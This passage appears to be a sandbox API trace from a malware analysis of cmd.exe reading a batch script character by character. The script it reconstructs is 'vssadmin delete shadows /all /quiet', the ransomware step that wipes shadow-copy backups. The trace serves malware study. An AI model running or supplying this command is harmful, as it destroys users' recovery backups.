lpNumberOfBytesRead=0xf1b85af768*=0x1, lpOverlapped=0x0) returned 1 [0045.094] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6d1ac9970, cbMultiByte=1, lpWideCharStr=0x7ff6d1ad3c4a, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0045.094] _get_osfhandle (_FileHandle=0) returned 0x27c [0045.094] SetFilePointer (in: hFile=0x27c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0045.094] ReadFile (in: hFile=0x27c, lpBuffer=0x7ff6d1ac9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0xf1b85af768, lpOverlapped=0x0 | out: lpBuffer=0x7ff6d1ac9970*, lpNumberOfBytesRead=0xf1b85af768*=0x1, lpOverlapped=0x0) returned 1 [0045.094] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6d1ac9970, cbMultiByte=1, lpWideCharStr=0x7ff6d1ad3c4c, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0045.094] _get_osfhandle (_FileHandle=0) returned 0x27c [0045.094] SetFilePointer (in: hFile=0x27c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0045.094] ReadFile (in: hFile=0x27c, lpBuffer=0x7ff6d1ac9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0xf1b85af768, lpOverlapped=0x0 | out: lpBuffer=0x7ff6d1ac9970*, lpNumberOfBytesRead=0xf1b85af768*=0x1, lpOverlapped=0x0) returned 1 [0045.094] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6d1ac9970, cbMultiByte=1, lpWideCharStr=0x7ff6d1ad3c4e, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0045.094] _get_osfhandle (_FileHandle=0) returned 0x27c [0045.094] SetFilePointer (in: hFile=0x27c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0045.095] ReadFile (in: hFile=0x27c, lpBuffer=0x7ff6d1ac9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0xf1b85af768, lpOverlapped=0x0 | out: lpBuffer=0x7ff6d1ac9970*, lpNumberOfBytesRead=0xf1b85af768*=0x1, lpOverlapped=0x0) returned 1 [0045.095] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6d1ac9970, cbMultiByte=1, lpWideCharStr=0x7ff6d1ad3c50, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0045.095] _get_osfhandle (_FileHandle=0) returned 0x27c [0045.095] SetFilePointer (in: hFile=0x27c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0045.095] ReadFile (in: hFile=0x27c, lpBuffer=0x7ff6d1ac9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0xf1b85af768, lpOverlapped=0x0 | out: lpBuffer=0x7ff6d1ac9970*, lpNumberOfBytesRead=0xf1b85af768*=0x1, lpOverlapped=0x0) returned 1 [0045.095] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6d1ac9970, cbMultiByte=1, lpWideCharStr=0x7ff6d1ad3c52, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0045.095] _get_osfhandle (_FileHandle=0) returned 0x27c [0045.095] SetFilePointer (in: hFile=0x27c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0045.095] ReadFile (in: hFile=0x27c, lpBuffer=0x7ff6d1ac9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0xf1b85af768, lpOverlapped=0x0 | out: lpBuffer=0x7ff6d1ac9970*, lpNumberOfBytesRead=0xf1b85af768*=0x1, lpOverlapped=0x0) returned 1 [0045.095] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6d1ac9970, cbMultiByte=1, lpWideCharStr=0x7ff6d1ad3c54, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0045.095] _get_osfhandle (_FileHandle=0) returned 0x27c [0045.095] SetFilePointer (in: hFile=0x27c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0045.095] ReadFile (in: hFile=0x27c, lpBuffer=0x7ff6d1ac9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0xf1b85af768, lpOverlapped=0x0 | out: lpBuffer=0x7ff6d1ac9970*, lpNumberOfBytesRead=0xf1b85af768*=0x1, lpOverlapped=0x0) returned 1 [0045.095] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6d1ac9970, cbMultiByte=1, lpWideCharStr=0x7ff6d1ad3c56, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0045.095] _get_osfhandle (_FileHandle=0) returned 0x27c [0045.095] SetFilePointer (in: hFile=0x27c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0045.095] ReadFile (in: hFile=0x27c, lpBuffer=0x7ff6d1ac9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0xf1b85af768, lpOverlapped=0x0 | out: lpBuffer=0x7ff6d1ac9970*, lpNumberOfBytesRead=0xf1b85af768*=0x1, lpOverlapped=0x0) returned 1 [0045.095] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6d1ac9970, cbMultiByte=1, lpWideCharStr=0x7ff6d1ad3c58, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0045.095] _get_osfhandle (_FileHandle=0) returned 0x27c [0045.095] SetFilePointer (in: hFile=0x27c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0045.095] ReadFile (in: hFile=0x27c, lpBuffer=0x7ff6d1ac9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0xf1b85af768, lpOverlapped=0x0 | out: lpBuffer=0x7ff6d1ac9970*, lpNumberOfBytesRead=0xf1b85af768*=0x1, lpOverlapped=0x0) returned 1 [0045.095] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6d1ac9970, cbMultiByte=1, lpWideCharStr=0x7ff6d1ad3c5a, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0045.095] _get_osfhandle (_FileHandle=0) returned 0x27c [0045.095] SetFilePointer (in: hFile=0x27c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0045.095] ReadFile (in: hFile=0x27c, lpBuffer=0x7ff6d1ac9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0xf1b85af768, lpOverlapped=0x0 | out: lpBuffer=0x7ff6d1ac9970*, lpNumberOfBytesRead=0xf1b85af768*=0x1, lpOverlapped=0x0) returned 1 [0045.095] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6d1ac9970, cbMultiByte=1, lpWideCharStr=0x7ff6d1ad3c5c, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0045.095] _get_osfhandle (_FileHandle=0) returned 0x27c [0045.095] SetFilePointer (in: hFile=0x27c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0045.096] ReadFile (in: hFile=0x27c, lpBuffer=0x7ff6d1ac9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0xf1b85af768, lpOverlapped=0x0 | out: lpBuffer=0x7ff6d1ac9970*, lpNumberOfBytesRead=0xf1b85af768*=0x1, lpOverlapped=0x0) returned 1 [0045.096] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6d1ac9970, cbMultiByte=1, lpWideCharStr=0x7ff6d1ad3c5e, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0045.096] _get_osfhandle (_FileHandle=0) returned 0x27c [0045.096] SetFilePointer (in: hFile=0x27c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0045.096] ReadFile (in: hFile=0x27c, lpBuffer=0x7ff6d1ac9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0xf1b85af768, lpOverlapped=0x0 | out: lpBuffer=0x7ff6d1ac9970*, lpNumberOfBytesRead=0xf1b85af768*=0x1, lpOverlapped=0x0) returned 1 [0045.096] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6d1ac9970, cbMultiByte=1, lpWideCharStr=0x7ff6d1ad3c60, cchWideChar=1 | out: lpWideCharStr="/") returned 1 [0045.096] _get_osfhandle (_FileHandle=0) returned 0x27c [0045.096] SetFilePointer (in: hFile=0x27c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0045.096] ReadFile (in: hFile=0x27c, lpBuffer=0x7ff6d1ac9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0xf1b85af768, lpOverlapped=0x0 | out: lpBuffer=0x7ff6d1ac9970*, lpNumberOfBytesRead=0xf1b85af768*=0x1, lpOverlapped=0x0) returned 1 [0045.096] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6d1ac9970, cbMultiByte=1, lpWideCharStr=0x7ff6d1ad3c62, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0045.096] _get_osfhandle (_FileHandle=0) returned 0x27c [0045.096] SetFilePointer (in: hFile=0x27c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0045.096] ReadFile (in: hFile=0x27c, lpBuffer=0x7ff6d1ac9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0xf1b85af768, lpOverlapped=0x0 | out: lpBuffer=0x7ff6d1ac9970*, lpNumberOfBytesRead=0xf1b85af768*=0x1, lpOverlapped=0x0) returned 1 [0045.096] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6d1ac9970, cbMultiByte=1, lpWideCharStr=0x7ff6d1ad3c64, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0045.096] _get_osfhandle (_FileHandle=0) returned 0x27c [0045.096] SetFilePointer (in: hFile=0x27c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0045.096] ReadFile (in: hFile=0x27c, lpBuffer=0x7ff6d1ac9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0xf1b85af768, lpOverlapped=0x0 | out: lpBuffer=0x7ff6d1ac9970*, lpNumberOfBytesRead=0xf1b85af768*=0x1, lpOverlapped=0x0) returned 1 [0045.096] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6d1ac9970, cbMultiByte=1, lpWideCharStr=0x7ff6d1ad3c66, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0045.096] _get_osfhandle (_FileHandle=0) returned 0x27c [0045.096] SetFilePointer (in: hFile=0x27c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0045.096] ReadFile (in: hFile=0x27c, lpBuffer=0x7ff6d1ac9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0xf1b85af768, lpOverlapped=0x0 | out: lpBuffer=0x7ff6d1ac9970*, lpNumberOfBytesRead=0xf1b85af768*=0x1, lpOverlapped=0x0) returned 1 [0045.096] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6d1ac9970, cbMultiByte=1, lpWideCharStr=0x7ff6d1ad3c68, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0045.096] _get_osfhandle (_FileHandle=0) returned 0x27c [0045.096] SetFilePointer (in: hFile=0x27c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0045.096] ReadFile (in: hFile=0x27c, lpBuffer=0x7ff6d1ac9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0xf1b85af768, lpOverlapped=0x0 | out: lpBuffer=0x7ff6d1ac9970*, lpNumberOfBytesRead=0xf1b85af768*=0x1, lpOverlapped=0x0) returned 1 [0045.096] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6d1ac9970, cbMultiByte=1, lpWideCharStr=0x7ff6d1ad3c6a, cchWideChar=1 | out: lpWideCharStr="/") returned 1 [0045.096] _get_osfhandle (_FileHandle=0) returned 0x27c [0045.096] SetFilePointer (in: hFile=0x27c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0045.097] ReadFile (in: hFile=0x27c, lpBuffer=0x7ff6d1ac9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0xf1b85af768, lpOverlapped=0x0 | out: lpBuffer=0x7ff6d1ac9970*, lpNumberOfBytesRead=0xf1b85af768*=0x1, lpOverlapped=0x0) returned 1 [0045.097] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6d1ac9970, cbMultiByte=1, lpWideCharStr=0x7ff6d1ad3c6c, cchWideChar=1 | out: lpWideCharStr="q") returned 1 [0045.097] _get_osfhandle (_FileHandle=0) returned 0x27c [0045.097] SetFilePointer (in: hFile=0x27c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0045.097] ReadFile (in: hFile=0x27c, lpBuffer=0x7ff6d1ac9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0xf1b85af768, lpOverlapped=0x0 | out: lpBuffer=0x7ff6d1ac9970*, lpNumberOfBytesRead=0xf1b85af768*=0x1, lpOverlapped=0x0) returned 1 [0045.097] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6d1ac9970, cbMultiByte=1, lpWideCharStr=0x7ff6d1ad3c6e, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0045.097] _get_osfhandle (_FileHandle=0) returned 0x27c [0045.097] SetFilePointer (in: hFile=0x27c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0045.097] ReadFile (in: hFile=0x27c, lpBuffer=0x7ff6d1ac9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0xf1b85af768, lpOverlapped=0x0 | out: lpBuffer=0x7ff6d1ac9970*, lpNumberOfBytesRead=0xf1b85af768*=0x1, lpOverlapped=0x0) returned 1 [0045.097] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6d1ac9970, cbMultiByte=1, lpWideCharStr=0x7ff6d1ad3c70, cchWideChar=1 | out: lpWideCharStr="i") returned 1 [0045.097] _get_osfhandle (_FileHandle=0) returned 0x27c [0045.097] SetFilePointer (in: hFile=0x27c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0045.097] ReadFile (in: hFile=0x27c, lpBuffer=0x7ff6d1ac9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0xf1b85af768, lpOverlapped=0x0 | out: lpBuffer=0x7ff6d1ac9970*, lpNumberOfBytesRead=0xf1b85af768*=0x1, lpOverlapped=0x0) returned 1 [0045.097] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6d1ac9970, cbMultiByte=1, lpWideCharStr=0x7ff6d1ad3c72, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0045.097] _get_osfhandle (_FileHandle=0) returned 0x27c [0045.097] SetFilePointer (in: hFile=0x27c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0045.097] ReadFile (in: hFile=0x27c, lpBuffer=0x7ff6d1ac9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0xf1b85af768, lpOverlapped=0x0 | out: lpBuffer=0x7ff6d1ac9970*, lpNumberOfBytesRead=0xf1b85af768*=0x1, lpOverlapped=0x0) returned 1 [0045.097] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6d1ac9970, cbMultiByte=1, lpWideCharStr=0x7ff6d1ad3c74, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0045.097] _get_osfhandle (_FileHandle=0) returned 0x27c [0045.097] SetFilePointer (in: hFile=0x27c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0045.097] ReadFile (in: hFile=0x27c, lpBuffer=0x7ff6d1ac9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0xf1b85af768, lpOverlapped=0x0 | out: lpBuffer=0x7ff6d1ac9970*, lpNumberOfBytesRead=0xf1b85af768*=0x1, lpOverlapped=0x0) returned 1 [0045.097] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6d1ac9970, cbMultiByte=1, lpWideCharStr=0x7ff6d1ad3c76, cchWideChar=1 | out: lpWideCharStr="\n") returned 1 [0045.098] _get_osfhandle (_FileHandle=0) returned 0x27c [0045.098] GetFileType (hFile=0x27c) returned 0x3 [0045.098] _get_osfhandle (_FileHandle=0) returned 0x27c [0045.098] SetFilePointer (in: hFile=0x27c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0045.098] _get_osfhandle (_FileHandle=1) returned 0x288 [0045.098] GetFileType (hFile=0x288) returned 0x3 [0045.098] _get_osfhandle (_FileHandle=1) returned 0x288 [0045.098] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="vssadmin delete shadows /all /quiet\n", cchWideChar=-1, lpMultiByteStr=0x7ff6d1ac9970, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="vssadmin delete shadows /all /quiet\n", lpUsedDefaultChar=0x0) returned 37 [0045.098] WriteFile (in: hFile=0x288, lpBuffer=0x7ff6d1ac9970*, nNumberOfBytesToWrite=0x24, lpNumberOfBytesWritten=0xf1b85af708, lpOverlapped=0x0 | out: lpBuffer=0x7ff6d1ac9970*, lpNumberOfBytesWritten=0xf1b85af708*=0x24, lpOverlapped=0x0) returned 1 [0045.098] GetProcessHeap () returned 0x2e8a1bb0000 [0045.098] RtlAllocateHeap (HeapHandle=0x2e8a1bb0000, Flags=0x8, Size=0x4012) returned 0x2e8a1bb8fe0 [0045.098] GetProcessHeap () returned 0x2e8a1bb0000 [0045.098] RtlFreeHeap (HeapHandle=0x2e8a1bb0000, Flags=0x0, BaseAddress=0x2e8a1bb8fe0) returned 1 [0045.099] _wcsicmp (_String1="vssadmin", _String2=")") returned 77 [0045.099] _wcsicmp (_String1="FOR", _String2="vssadmin") returned -16 [0045.099] _wcsicmp (_String1="FOR/?", _String2="vssadmin") returned -16 [0045.099] _wcsicmp (_String1="IF", _String2="vssadmin") returned -13 [0045.099] _wcsicmp (_String1="IF/?", _String2="vssadmin") returned -13 [0045.099] _wcsicmp (_String1="REM", _String2="vssadmin") returned -4 [0045.099] _wcsicmp (_String1="REM/?", _String2="vssadmin") returned -4 [0045.099] GetProcessHeap () returned 0x2e8a1bb0000 [0045.099] RtlAllocateHeap (HeapHandle=0x2e8a1bb0000, Flags=0x8, Size=0xb0) returned 0x2e8a1bb8320 [0045.099] GetProcessHeap () returned 0x2e8a1bb0000 [0045.099] RtlAllocateHeap (HeapHandle=0x2e8a1bb0000, Flags=0x8, Size=0x22) returned 0x2e8a1bb6a80 [0045.100] GetProcessHeap () returned 0x2e8a1bb0000 [0045.100] RtlAllocateHeap (HeapHandle=0x2e8a1bb0000, Flags=0x8, Size=0x48) returned 0x2e8a1bb1850 [0045.100] GetConsoleOutputCP () returned 0x1b5 [0045.909] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff6d1acfbb0 | out: lpCPInfo=0x7ff6d1acfbb0) returned 1 [0045.909] SetThreadUILanguage (LangId=0x0) returned 0x409 [0046.306] GetConsoleTitleW (in: lpConsoleTitle=0xf1b85af550, nSize=0x104 | out: lpConsoleTitle="Administrator: C:\\WINDOWS\\system32\\cmd.exe") returned 0x2b [0046.798] malloc (_Size=0xffce) returned 0x2e8a1da0840 [0046.803] ??_V@YAXPEAX@Z () returned 0x2e8a1da0840 [0046.810] malloc (_Size=0xffce) returned 0x2e8a1db0820 [0046.810] ??_V@YAXPEAX@Z () returned 0x2e8a1db0820 [0046.811] _wcsicmp (_String1="vssadmin", _String2="DIR") returned 18 [0046.811] _wcsicmp (_String1="vssadmin", _String2="ERASE") returned 17 [0046.811] _wcsicmp (_String1="vssadmin", _String2="DEL") returned 18 [0046.811] _wcsicmp (_String1="vssadmin", _String2="TYPE") returned 2 [0046.811] _wcsicmp (_String1="vssadmin", _String2="COPY") returned 19 [0046.811] _wcsicmp (_String1="vssadmin", _String2="CD") returned 19 [0046.811] _wcsicmp (_String1="vssadmin", _String2="CHDIR") returned 19 [0046.811] _wcsicmp (_String1="vssadmin", _String2="RENAME") returned 4 [0046.811] _wcsicmp (_String1="vssadmin", _String2="REN") returned 4 [0046.811] _wcsicmp (_String1="vssadmin", _String2="ECHO") returned 17 [0046.811] _wcsicmp (_String1="vssadmin", _String2="SET") returned 3 [0046.811] _wcsicmp (_String1="vssadmin", _String2="PAUSE") returned 6 [0046.811] _wcsicmp (_String1="vssadmin", _String2="DATE") returned 18 [0046.811] _wcsicmp (_String1="vssadmin", _String2="TIME") returned 2 [0046.811] _wcsicmp (_String1="vssadmin", _String2="PROMPT") returned 6 [0046.811] _wcsicmp (_String1="vssadmin", _String2="MD") returned 9 [0046.811] _wcsicmp (_String1="vssadmin", _String2="MKDIR") returned 9 [0046.811] _wcsicmp (_String1="vssadmin", _String2="RD") returned 4 [0046.811] _wcsicmp (_String1="vssadmin", _String2="RMDIR") returned 4 [0046.811] _wcsicmp (_String1="vssadmin", _String2="PATH") returned 6 [0046.811] _wcsicmp (_String1="vssadmin", _String2="GOTO") returned 15 [0046.811] _wcsicmp (_String1="vssadmin", _String2="SHIFT") returned 3 [0046.811] _wcsicmp (_String1="vssadmin", _String2="CLS") returned 19 [0046.811] _wcsicmp (_String1="vssadmin", _String2="CALL") returned 19 [0046.811] _wcsicmp (_String1="vssadmin", _String2="VERIFY") returned 14 [0046.812] _wcsicmp (_String1="vssadmin", _String2="VER") returned 14 [0046.812] _wcsicmp (_String1="vssadmin", _String2="VOL") returned 4 [0046.812] _wcsicmp (_String1="vssadmin", _String2="EXIT") returned 17 [0046.812] _wcsicmp (_String1="vssadmin", _String2="SETLOCAL") returned 3 [0046.812] _wcsicmp (_String1="vssadmin", _String2="ENDLOCAL") returned 17 [0046.812] _wcsicmp (_String1="vssadmin", _String2="TITLE") returned 2 [0046.812] _wcsicmp (_String1="vssadmin", _String2="START") returned 3 [0046.812] _wcsicmp (_String1="vssadmin", _String2="DPATH") returned 18 [0046.812] _wcsicmp (_String1="vssadmin", _String2="KEYS") returned 11 [0046.812] _wcsicmp (_String1="vssadmin", _String2="MOVE") returned 9 [0046.812] _wcsicmp (_String1="vssadmin", _String2="PUSHD") returned 6 [0046.812] _wcsicmp (_String1="vssadmin", _String2="POPD") returned 6 [0046.812] _wcsicmp (_String1="vssadmin", _String2="ASSOC") returned 21 [0046.812] _wcsicmp (_String1="vssadmin", _String2="FTYPE") returned 16 [0046.812] _wcsicmp (_String1="vssadmin", _String2="BREAK") returned 20 [0046.812] _wcsicmp (_String1="vssadmin", _String2="COLOR") returned 19 [0046.812] _wcsicmp (_String1="vssadmin", _String2="MKLINK") returned 9 [0046.812] _wcsicmp (_String1="vssadmin", _String2="DIR") returned 18 [0046.812] _wcsicmp (_String1="vssadmin", _String2="ERASE") returned 17 [0046.812] _wcsicmp (_String1="vssadmin", _String2="DEL") returned 18 [0046.812] _wcsicmp (_String1="vssadmin", _String2="TYPE") returned 2 [0046.812] _wcsicmp (_String1="vssadmin", _String2="COPY") returned 19 [0046.812] _wcsicmp (_String1="vssadmin", _String2="CD") returned 19 [0046.812] _wcsicmp (_String1="vssadmin", _String2="CHDIR") returned 19 [0046.812] _wcsicmp (_String1="vssadmin", _String2="RENAME") returned 4 [0046.812] _wcsicmp (_String1="vssadmin", _String2="REN") returned 4 [0046.812] _wcsicmp (_String1="vssadmin", _String2="ECHO") returned 17 [0046.812] _wcsicmp (_String1="vssadmin", _String2="SET") returned 3 [0046.812] _wcsicmp (_String1="vssadmin", _String2="PAUSE") returned 6 [0046.812] _wcsicmp (_String1="vssadmin", _String2="DATE") returned 18 [0046.812] _wcsicmp (_String1="vssadmin", _String2="TIME") returned 2 [0046.812] _wcsicmp (_String1="vssadmin", _String2="PROMPT") returned 6 [0046.812] _wcsicmp (_String1="vssadmin", _String2="MD") returned 9 [0046.812] _wcsicmp (_String1="vssadmin", _String2="MKDIR") returned 9 [0046.812] _wcsicmp (_String1="vssadmin", _String2="RD") returned 4 [0046.812] _wcsicmp (_String1="vssadmin", _String2="RMDIR") returned 4 [0046.812] _wcsicmp (_String1="vssadmin", _String2="PATH") returned 6 [0046.812] _wcsicmp (_String1="vssadmin", _String2="GOTO") returned 15 [0046.812] _wcsicmp (_String1="vssadmin", _String2="SHIFT") returned 3 [0046.812] _wcsicmp (_String1="vssadmin", _String2="CLS") returned 19 [0046.812] _wcsicmp (_String1="vssadmin", _String2="CALL") returned 19 [0046.813] _wcsicmp (_String1="vssadmin", _String2="VERIFY") returned 14 [0046.813] _wcsicmp (_String1="vssadmin", _String2="VER") returned 14 [0046.813] _wcsicmp (_String1="vssadmin", _String2="VOL") returned 4 [0046.813] _wcsicmp (_String1="vssadmin", _String2="EXIT") returned 17 [0046.813] _wcsicmp (_String1="vssadmin", _String2="SETLOCAL") returned 3 [0046.813] _wcsicmp (_String1="vssadmin", _String2="ENDLOCAL") returned 17 [0046.813] _wcsicmp (_String1="vssadmin", _String2="TITLE") returned 2 [0046.813] _wcsicmp (_String1="vssadmin", _String2="START") returned 3 [0046.813] _wcsicmp (_String1="vssadmin", _String2="DPATH") returned 18 [0046.813] _wcsicmp (_String1="vssadmin", _String2="KEYS") returned 11 [0046.813] _wcsicmp (_String1="vssadmin", _String2="MOVE") returned 9 [0046.813] _wcsicmp (_String1="vssadmin", _String2="PUSHD") returned 6 [0046.813] _wcsicmp (_String1="vssadmin", _String2="POPD") returned 6 [0046.813] _wcsicmp (_String1="vssadmin", _String2="ASSOC") returned 21 [0046.813] _wcsicmp (_String1="vssadmin", _String2="FTYPE") returned 16 [0046.813] _wcsicmp (_String1="vssadmin", _String2="BREAK") returned 20 [0046.813] _wcsicmp (_String1="vssadmin", _String2="COLOR") returned 19 [0046.813] _wcsicmp (_String1="vssadmin", _String2="MKLINK") returned 9 [0046.813] _wcsicmp (_String1="vssadmin", _String2="FOR") returned 16 [0046.813] _wcsicmp (_String1="vssadmin", _String2="IF") returned 13 [0046.813] _wcsicmp (_String1="vssadmin", _String2="REM") returned 4 [0046.813] ??_V@YAXPEAX@Z () returned 0x1 [0046.813] GetProcessHeap () returned 0x2e8a1bb0000 [0046.813] RtlAllocateHeap (HeapHandle=0x2e8a1bb0000, Flags=0x8, Size=0xffde) returned 0x2e8a1bb8fe0 [0046.814] GetProcessHeap () returned 0x2e8a1bb0000 [0046.814] RtlAllocateHeap (HeapHandle=0x2e8a1bb0000, Flags=0x8, Size=0x5a) returned 0x2e8a1bb83e0 [0046.814] _wcsnicmp (_String1="vssa", _String2="cmd ", _MaxCount=0x4) returned 19 [0046.814] malloc (_Size=0xffce) returned 0x2e8a1db0820 [0046.814] ??_V@YAXPEAX@Z () returned 0x2e8a1db0820 [0046.814] GetProcessHeap () returned 0x2e8a1bb0000 [0046.814] RtlAllocateHeap (HeapHandle=0x2e8a1bb0000, Flags=0x8, Size=0x1ffac) returned 0x2e8a1bc8fd0 [0046.816] SetErrorMode (uMode=0x0) returned 0x0 [0046.816] SetErrorMode (uMode=0x1) returned 0x0 [0046.816] GetFullPathNameW (in: lpFileName=".", nBufferLength=0xffce, lpBuffer=0x2e8a1bc8fe0, lpFilePart=0xf1b85aedd0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop", lpFilePart=0xf1b85aedd0*="Desktop") returned 0x17 [0046.816] SetErrorMode (uMode=0x0) returned 0x1 [0046.816] GetProcessHeap () returned 0x2e8a1bb0000 [0046.816] RtlReAllocateHeap 